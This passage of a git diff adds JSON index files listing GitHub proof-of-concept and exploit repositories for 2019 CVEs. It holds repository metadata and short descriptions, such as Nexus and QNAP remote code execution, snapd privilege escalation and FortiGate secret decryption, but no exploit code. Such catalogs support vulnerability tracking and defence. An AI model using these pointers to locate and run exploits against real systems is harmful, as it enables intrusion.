"Chethine\/EsFileExplorer-CVE-2019-6447", + "owner": { + "login": "Chethine", + "id": 69776481, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69776481?v=4", + "html_url": "https:\/\/github.com\/Chethine", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chethine\/EsFileExplorer-CVE-2019-6447", + "description": "Exploiting Android Vulnerability in ES File Explorer", + "fork": false, + "created_at": "2022-07-08T14:45:50Z", + "updated_at": "2022-08-15T20:15:09Z", + "pushed_at": "2022-07-08T15:58:44Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 520586287, + "name": "CVE-2019-6447", + "full_name": "vino-theva\/CVE-2019-6447", + "owner": { + "login": "vino-theva", + "id": 106059311, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106059311?v=4", + "html_url": "https:\/\/github.com\/vino-theva", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vino-theva\/CVE-2019-6447", + "description": "This paper is about manual exploitation of android open port vulnerability found in ES file manager. This open TCP 59777 port allows the attacker to install a backdoor and gather all the user’s data. Further in this paper there will be a proof of concept presented to consolidate the vulnerability. Download the PDF and enjoy !!! Cheers !!!", + "fork": false, + "created_at": "2022-08-02T17:16:34Z", + "updated_at": "2022-08-02T17:16:35Z", + "pushed_at": "2022-08-02T17:22:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 577189013, + "name": "CVE-2019-6447-in-Mobile-Application", + "full_name": "KaviDk\/CVE-2019-6447-in-Mobile-Application", + "owner": { + "login": "KaviDk", + "id": 49784676, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49784676?v=4", + "html_url": "https:\/\/github.com\/KaviDk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/KaviDk\/CVE-2019-6447-in-Mobile-Application", + "description": null, + "fork": false, + "created_at": "2022-12-12T07:10:51Z", + "updated_at": "2022-12-12T07:10:51Z", + "pushed_at": "2022-12-12T07:15:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 826955351, + "name": "CVE-2019-6447-Exploitation", + "full_name": "Cmadhushanka\/CVE-2019-6447-Exploitation", + "owner": { + "login": "Cmadhushanka", + "id": 143883929, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/143883929?v=4", + "html_url": "https:\/\/github.com\/Cmadhushanka", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cmadhushanka\/CVE-2019-6447-Exploitation", + "description": "year 2 semester 1 Systems and Network Programming Assignment", + "fork": false, + "created_at": "2024-07-10T18:04:14Z", + "updated_at": "2024-07-10T18:04:45Z", + "pushed_at": "2024-07-10T18:04:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-6453.json b/2019/CVE-2019-6453.json new file mode 100644 index 0000000000..91ef71acfe --- /dev/null +++ b/2019/CVE-2019-6453.json @@ -0,0 +1,66 @@ +[ + { + "id": 171244957, + "name": "cve-2019-6453-poc", + "full_name": "proofofcalc\/cve-2019-6453-poc", + "owner": { + "login": "proofofcalc", + "id": 47607270, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47607270?v=4", + "html_url": "https:\/\/github.com\/proofofcalc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/proofofcalc\/cve-2019-6453-poc", + "description": "Proof of calc for CVE-2019-6453", + "fork": false, + "created_at": "2019-02-18T08:35:03Z", + "updated_at": "2024-11-22T06:43:00Z", + "pushed_at": "2024-01-01T16:54:10Z", + "stargazers_count": 49, + "watchers_count": 49, + "has_discussions": false, + "forks_count": 16, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2019-6453" + ], + "visibility": "public", + "forks": 16, + "watchers": 49, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 197653851, + "name": "mIRC-CVE-2019-6453", + "full_name": "andripwn\/mIRC-CVE-2019-6453", + "owner": { + "login": "andripwn", + "id": 52893492, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52893492?v=4", + "html_url": "https:\/\/github.com\/andripwn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/andripwn\/mIRC-CVE-2019-6453", + "description": "Proof of calc for CVE-2019-6453", + "fork": false, + "created_at": "2019-07-18T20:40:09Z", + "updated_at": "2020-12-13T12:56:37Z", + "pushed_at": "2020-09-20T14:29:13Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-6467.json b/2019/CVE-2019-6467.json new file mode 100644 index 0000000000..b3a72ac82c --- /dev/null +++ b/2019/CVE-2019-6467.json @@ -0,0 +1,33 @@ +[ + { + "id": 183349186, + "name": "CVE-2019-6467", + "full_name": "knqyf263\/CVE-2019-6467", + "owner": { + "login": "knqyf263", + "id": 2253692, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2253692?v=4", + "html_url": "https:\/\/github.com\/knqyf263", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/knqyf263\/CVE-2019-6467", + "description": "CVE-2019-6467 (BIND nxdomain-redirect)", + "fork": false, + "created_at": "2019-04-25T03:26:42Z", + "updated_at": "2024-08-12T19:48:15Z", + "pushed_at": "2019-04-25T04:06:48Z", + "stargazers_count": 26, + "watchers_count": 26, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 26, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-6487.json b/2019/CVE-2019-6487.json new file mode 100644 index 0000000000..c7f605e2ea --- /dev/null +++ b/2019/CVE-2019-6487.json @@ -0,0 +1,33 @@ +[ + { + "id": 166241615, + "name": "TP-Link-WDR-Router-Command-injection_POC", + "full_name": "afang5472\/TP-Link-WDR-Router-Command-injection_POC", + "owner": { + "login": "afang5472", + "id": 18503100, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18503100?v=4", + "html_url": "https:\/\/github.com\/afang5472", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/afang5472\/TP-Link-WDR-Router-Command-injection_POC", + "description": "CVE-2019-6487. A command injection vulnerability in TP-Link WDR5620 Series up to verion 3.", + "fork": false, + "created_at": "2019-01-17T14:44:12Z", + "updated_at": "2024-08-12T19:44:56Z", + "pushed_at": "2019-01-19T10:49:21Z", + "stargazers_count": 38, + "watchers_count": 38, + "has_discussions": false, + "forks_count": 17, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 17, + "watchers": 38, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-6690.json b/2019/CVE-2019-6690.json new file mode 100644 index 0000000000..ac12688a45 --- /dev/null +++ b/2019/CVE-2019-6690.json @@ -0,0 +1,64 @@ +[ + { + "id": 166676940, + "name": "CVE-2019-6690-python-gnupg-vulnerability", + "full_name": "stigtsp\/CVE-2019-6690-python-gnupg-vulnerability", + "owner": { + "login": "stigtsp", + "id": 75371, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75371?v=4", + "html_url": "https:\/\/github.com\/stigtsp", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/stigtsp\/CVE-2019-6690-python-gnupg-vulnerability", + "description": null, + "fork": false, + "created_at": "2019-01-20T15:29:46Z", + "updated_at": "2019-09-22T10:45:25Z", + "pushed_at": "2019-09-21T17:35:44Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 179225702, + "name": "CVE-2019-6690", + "full_name": "brianwrf\/CVE-2019-6690", + "owner": { + "login": "brianwrf", + "id": 8141813, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8141813?v=4", + "html_url": "https:\/\/github.com\/brianwrf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/brianwrf\/CVE-2019-6690", + "description": "It is a simple PoC of Improper Input Validation in python-gnupg 0.4.3 (CVE-2019-6690).", + "fork": false, + "created_at": "2019-04-03T06:34:48Z", + "updated_at": "2019-04-08T14:49:17Z", + "pushed_at": "2019-04-03T07:57:14Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 6, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-6693.json b/2019/CVE-2019-6693.json new file mode 100644 index 0000000000..05d9300bc8 --- /dev/null +++ b/2019/CVE-2019-6693.json @@ -0,0 +1,95 @@ +[ + { + "id": 440563866, + "name": "CVE-2019-6693", + "full_name": "gquere\/CVE-2019-6693", + "owner": { + "login": "gquere", + "id": 1585000, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1585000?v=4", + "html_url": "https:\/\/github.com\/gquere", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gquere\/CVE-2019-6693", + "description": "Decrypt FortiGate configuration secrets", + "fork": false, + "created_at": "2021-12-21T15:28:00Z", + "updated_at": "2024-08-13T15:19:45Z", + "pushed_at": "2021-12-21T15:35:55Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 660545507, + "name": "CVE-2020-9289", + "full_name": "synacktiv\/CVE-2020-9289", + "owner": { + "login": "synacktiv", + "id": 50145679, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50145679?v=4", + "html_url": "https:\/\/github.com\/synacktiv", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/synacktiv\/CVE-2020-9289", + "description": "Decrypt reversible secrets encrypted using the default hardcoded key related to CVE-2020-9289 on FortiAnalyzer\/FortiManager (the only difference with CVE-2019-6693 is the encryption routine).", + "fork": false, + "created_at": "2023-06-30T08:48:37Z", + "updated_at": "2024-08-14T17:14:37Z", + "pushed_at": "2023-06-30T08:55:57Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 10, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 729076408, + "name": "cve-2019-6693", + "full_name": "saladandonionrings\/cve-2019-6693", + "owner": { + "login": "saladandonionrings", + "id": 61053314, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61053314?v=4", + "html_url": "https:\/\/github.com\/saladandonionrings", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/saladandonionrings\/cve-2019-6693", + "description": "An authorized remote user with access or knowledge of the standard encryption key can gain access and decrypt the FortiOS backup files and all non-administator passwords, private keys and High Availability passwords.", + "fork": false, + "created_at": "2023-12-08T11:00:40Z", + "updated_at": "2024-10-22T14:04:22Z", + "pushed_at": "2023-12-19T16:39:37Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-6715.json b/2019/CVE-2019-6715.json new file mode 100644 index 0000000000..f90910a05e --- /dev/null +++ b/2019/CVE-2019-6715.json @@ -0,0 +1,33 @@ +[ + { + "id": 221241280, + "name": "cve-2019-6715", + "full_name": "random-robbie\/cve-2019-6715", + "owner": { + "login": "random-robbie", + "id": 4902869, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4902869?v=4", + "html_url": "https:\/\/github.com\/random-robbie", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/random-robbie\/cve-2019-6715", + "description": null, + "fork": false, + "created_at": "2019-11-12T14:47:25Z", + "updated_at": "2024-07-05T17:31:57Z", + "pushed_at": "2019-11-12T14:54:10Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 11, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-7192.json b/2019/CVE-2019-7192.json new file mode 100644 index 0000000000..765ee4fc6f --- /dev/null +++ b/2019/CVE-2019-7192.json @@ -0,0 +1,67 @@ +[ + { + "id": 265804750, + "name": "cve-2019-7192-check", + "full_name": "cycraft-corp\/cve-2019-7192-check", + "owner": { + "login": "cycraft-corp", + "id": 65086853, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65086853?v=4", + "html_url": "https:\/\/github.com\/cycraft-corp", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cycraft-corp\/cve-2019-7192-check", + "description": "Checker for QNAP pre-auth root RCE (CVE-2019-7192 ~ CVE-2019-7195)", + "fork": false, + "created_at": "2020-05-21T09:14:28Z", + "updated_at": "2024-04-10T05:31:12Z", + "pushed_at": "2021-06-10T07:24:54Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 13, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 266572508, + "name": "CVE-2019-7192_QNAP_Exploit", + "full_name": "th3gundy\/CVE-2019-7192_QNAP_Exploit", + "owner": { + "login": "th3gundy", + "id": 6793697, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6793697?v=4", + "html_url": "https:\/\/github.com\/th3gundy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/th3gundy\/CVE-2019-7192_QNAP_Exploit", + "description": "QNAP pre-auth root RCE Exploit (CVE-2019-7192 ~ CVE-2019-7195)", + "fork": false, + "created_at": "2020-05-24T15:44:29Z", + "updated_at": "2024-07-07T17:15:34Z", + "pushed_at": "2020-05-24T16:28:46Z", + "stargazers_count": 85, + "watchers_count": 85, + "has_discussions": false, + "forks_count": 35, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "exploit", + "qnap" + ], + "visibility": "public", + "forks": 35, + "watchers": 85, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-7213.json b/2019/CVE-2019-7213.json new file mode 100644 index 0000000000..7ffcbbf729 --- /dev/null +++ b/2019/CVE-2019-7213.json @@ -0,0 +1,33 @@ +[ + { + "id": 535424964, + "name": "CVE-2019-7213", + "full_name": "secunnix\/CVE-2019-7213", + "owner": { + "login": "secunnix", + "id": 104568161, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104568161?v=4", + "html_url": "https:\/\/github.com\/secunnix", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/secunnix\/CVE-2019-7213", + "description": " SmarterMail 16.x Exploit", + "fork": false, + "created_at": "2022-09-11T21:01:53Z", + "updated_at": "2024-08-12T20:26:58Z", + "pushed_at": "2022-09-11T21:02:26Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-7214.json b/2019/CVE-2019-7214.json new file mode 100644 index 0000000000..643cb83427 --- /dev/null +++ b/2019/CVE-2019-7214.json @@ -0,0 +1,64 @@ +[ + { + "id": 322967860, + "name": "CVE-2019-7214", + "full_name": "devzspy\/CVE-2019-7214", + "owner": { + "login": "devzspy", + "id": 7217419, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7217419?v=4", + "html_url": "https:\/\/github.com\/devzspy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/devzspy\/CVE-2019-7214", + "description": "Collection of PoCs created for SmarterMail < Build 6985 RCE", + "fork": false, + "created_at": "2020-12-20T01:00:02Z", + "updated_at": "2022-02-23T04:22:23Z", + "pushed_at": "2020-12-20T01:07:55Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 343438462, + "name": "-CVE-2019-7214", + "full_name": "andyfeili\/-CVE-2019-7214", + "owner": { + "login": "andyfeili", + "id": 59521017, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59521017?v=4", + "html_url": "https:\/\/github.com\/andyfeili", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/andyfeili\/-CVE-2019-7214", + "description": null, + "fork": false, + "created_at": "2021-03-01T14:09:02Z", + "updated_at": "2021-03-31T13:33:47Z", + "pushed_at": "2021-03-01T14:10:35Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-7216.json b/2019/CVE-2019-7216.json new file mode 100644 index 0000000000..9cd8369ba1 --- /dev/null +++ b/2019/CVE-2019-7216.json @@ -0,0 +1,33 @@ +[ + { + "id": 168365175, + "name": "CVE-2019-7216", + "full_name": "Ekultek\/CVE-2019-7216", + "owner": { + "login": "Ekultek", + "id": 14183473, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14183473?v=4", + "html_url": "https:\/\/github.com\/Ekultek", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ekultek\/CVE-2019-7216", + "description": "Filechucker filter bypass Proof Of Concept", + "fork": false, + "created_at": "2019-01-30T15:23:40Z", + "updated_at": "2023-09-28T10:57:58Z", + "pushed_at": "2019-02-01T16:56:53Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 10, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-7219.json b/2019/CVE-2019-7219.json new file mode 100644 index 0000000000..cf834d1239 --- /dev/null +++ b/2019/CVE-2019-7219.json @@ -0,0 +1,33 @@ +[ + { + "id": 170672635, + "name": "CVE-2019-7219", + "full_name": "verifysecurity\/CVE-2019-7219", + "owner": { + "login": "verifysecurity", + "id": 17159314, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17159314?v=4", + "html_url": "https:\/\/github.com\/verifysecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/verifysecurity\/CVE-2019-7219", + "description": "CVE-2019-7219", + "fork": false, + "created_at": "2019-02-14T10:24:48Z", + "updated_at": "2019-04-12T19:30:42Z", + "pushed_at": "2019-04-12T19:30:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-7238.json b/2019/CVE-2019-7238.json new file mode 100644 index 0000000000..fc36fb36aa --- /dev/null +++ b/2019/CVE-2019-7238.json @@ -0,0 +1,157 @@ +[ + { + "id": 172401532, + "name": "CVE-2019-7238", + "full_name": "mpgn\/CVE-2019-7238", + "owner": { + "login": "mpgn", + "id": 5891788, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5891788?v=4", + "html_url": "https:\/\/github.com\/mpgn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mpgn\/CVE-2019-7238", + "description": "🐱‍💻 Poc of CVE-2019-7238 - Nexus Repository Manager 3 Remote Code Execution 🐱‍💻", + "fork": false, + "created_at": "2019-02-24T23:09:43Z", + "updated_at": "2024-08-23T21:05:36Z", + "pushed_at": "2019-02-25T07:37:07Z", + "stargazers_count": 149, + "watchers_count": 149, + "has_discussions": false, + "forks_count": 55, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 55, + "watchers": 149, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 187840869, + "name": "CVE-2019-7238", + "full_name": "jas502n\/CVE-2019-7238", + "owner": { + "login": "jas502n", + "id": 16593068, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16593068?v=4", + "html_url": "https:\/\/github.com\/jas502n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jas502n\/CVE-2019-7238", + "description": "Nexus Repository Manager 3 Remote Code Execution without authentication < 3.15.0", + "fork": false, + "created_at": "2019-05-21T13:16:02Z", + "updated_at": "2024-06-25T09:42:49Z", + "pushed_at": "2019-08-19T17:33:56Z", + "stargazers_count": 80, + "watchers_count": 80, + "has_discussions": false, + "forks_count": 28, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 28, + "watchers": 80, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 199046172, + "name": "nexus_rce_CVE-2019-7238", + "full_name": "verctor\/nexus_rce_CVE-2019-7238", + "owner": { + "login": "verctor", + "id": 24811125, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24811125?v=4", + "html_url": "https:\/\/github.com\/verctor", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/verctor\/nexus_rce_CVE-2019-7238", + "description": "Some debug notes and exploit(not blind)", + "fork": false, + "created_at": "2019-07-26T16:08:40Z", + "updated_at": "2023-08-15T22:33:33Z", + "pushed_at": "2019-07-28T02:32:07Z", + "stargazers_count": 40, + "watchers_count": 40, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 40, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 233010845, + "name": "CVE-2019-7238_Nexus_RCE_Tool", + "full_name": "magicming200\/CVE-2019-7238_Nexus_RCE_Tool", + "owner": { + "login": "magicming200", + "id": 23466759, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23466759?v=4", + "html_url": "https:\/\/github.com\/magicming200", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/magicming200\/CVE-2019-7238_Nexus_RCE_Tool", + "description": "CVE-2019-7238 Nexus RCE漏洞图形化一键检测工具。CVE-2019-7238 Nexus RCE Vul POC Tool.", + "fork": false, + "created_at": "2020-01-10T09:19:10Z", + "updated_at": "2024-11-12T10:15:31Z", + "pushed_at": "2020-01-15T08:36:05Z", + "stargazers_count": 23, + "watchers_count": 23, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 23, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 369228387, + "name": "CVE-2019-7238", + "full_name": "smallpiggy\/CVE-2019-7238", + "owner": { + "login": "smallpiggy", + "id": 44887613, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44887613?v=4", + "html_url": "https:\/\/github.com\/smallpiggy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/smallpiggy\/CVE-2019-7238", + "description": "RCE", + "fork": false, + "created_at": "2021-05-20T14:03:10Z", + "updated_at": "2021-05-20T14:48:35Z", + "pushed_at": "2021-05-20T14:44:06Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-7304.json b/2019/CVE-2019-7304.json new file mode 100644 index 0000000000..e40f5c0a75 --- /dev/null +++ b/2019/CVE-2019-7304.json @@ -0,0 +1,135 @@ +[ + { + "id": 170261590, + "name": "dirty_sock", + "full_name": "initstring\/dirty_sock", + "owner": { + "login": "initstring", + "id": 26131150, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26131150?v=4", + "html_url": "https:\/\/github.com\/initstring", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/initstring\/dirty_sock", + "description": "Linux privilege escalation exploit via snapd (CVE-2019-7304)", + "fork": false, + "created_at": "2019-02-12T06:02:06Z", + "updated_at": "2024-09-16T22:56:07Z", + "pushed_at": "2019-05-09T21:34:26Z", + "stargazers_count": 662, + "watchers_count": 662, + "has_discussions": false, + "forks_count": 148, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "linux", + "privilege-escalation", + "security" + ], + "visibility": "public", + "forks": 148, + "watchers": 662, + "score": 0, + "subscribers_count": 18 + }, + { + "id": 170741210, + "name": "CVE-2019-7304_DirtySock", + "full_name": "SecuritySi\/CVE-2019-7304_DirtySock", + "owner": { + "login": "SecuritySi", + "id": 7517443, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7517443?v=4", + "html_url": "https:\/\/github.com\/SecuritySi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SecuritySi\/CVE-2019-7304_DirtySock", + "description": "Payload Generator", + "fork": false, + "created_at": "2019-02-14T18:48:56Z", + "updated_at": "2024-04-09T12:35:44Z", + "pushed_at": "2019-02-14T18:49:32Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 6, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 352460406, + "name": "snap_priv_esc", + "full_name": "elvi7major\/snap_priv_esc", + "owner": { + "login": "elvi7major", + "id": 31170276, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31170276?v=4", + "html_url": "https:\/\/github.com\/elvi7major", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/elvi7major\/snap_priv_esc", + "description": "Another implementation for linux privilege escalation exploit via snap(d) (CVE-2019-7304)", + "fork": false, + "created_at": "2021-03-28T23:17:27Z", + "updated_at": "2024-09-21T00:56:13Z", + "pushed_at": "2021-03-28T23:31:22Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 390354257, + "name": "dirty_sock", + "full_name": "f4T1H21\/dirty_sock", + "owner": { + "login": "f4T1H21", + "id": 83399767, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83399767?v=4", + "html_url": "https:\/\/github.com\/f4T1H21", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/f4T1H21\/dirty_sock", + "description": "Local Privilege Escalation via snapd (CVE-2019-7304) Remastered PoC exploit", + "fork": false, + "created_at": "2021-07-28T13:06:41Z", + "updated_at": "2021-12-29T18:12:51Z", + "pushed_at": "2021-07-28T13:26:00Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2019-7304", + "exploit", + "local-privilege-escalation", + "poc" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-7356.json b/2019/CVE-2019-7356.json new file mode 100644 index 0000000000..1bfac7667f --- /dev/null +++ b/2019/CVE-2019-7356.json @@ -0,0 +1,33 @@ +[ + { + "id": 309601755, + "name": "CVE-2019-7356", + "full_name": "ngpentest007\/CVE-2019-7356", + "owner": { + "login": "ngpentest007", + "id": 50012770, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50012770?v=4", + "html_url": "https:\/\/github.com\/ngpentest007", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ngpentest007\/CVE-2019-7356", + 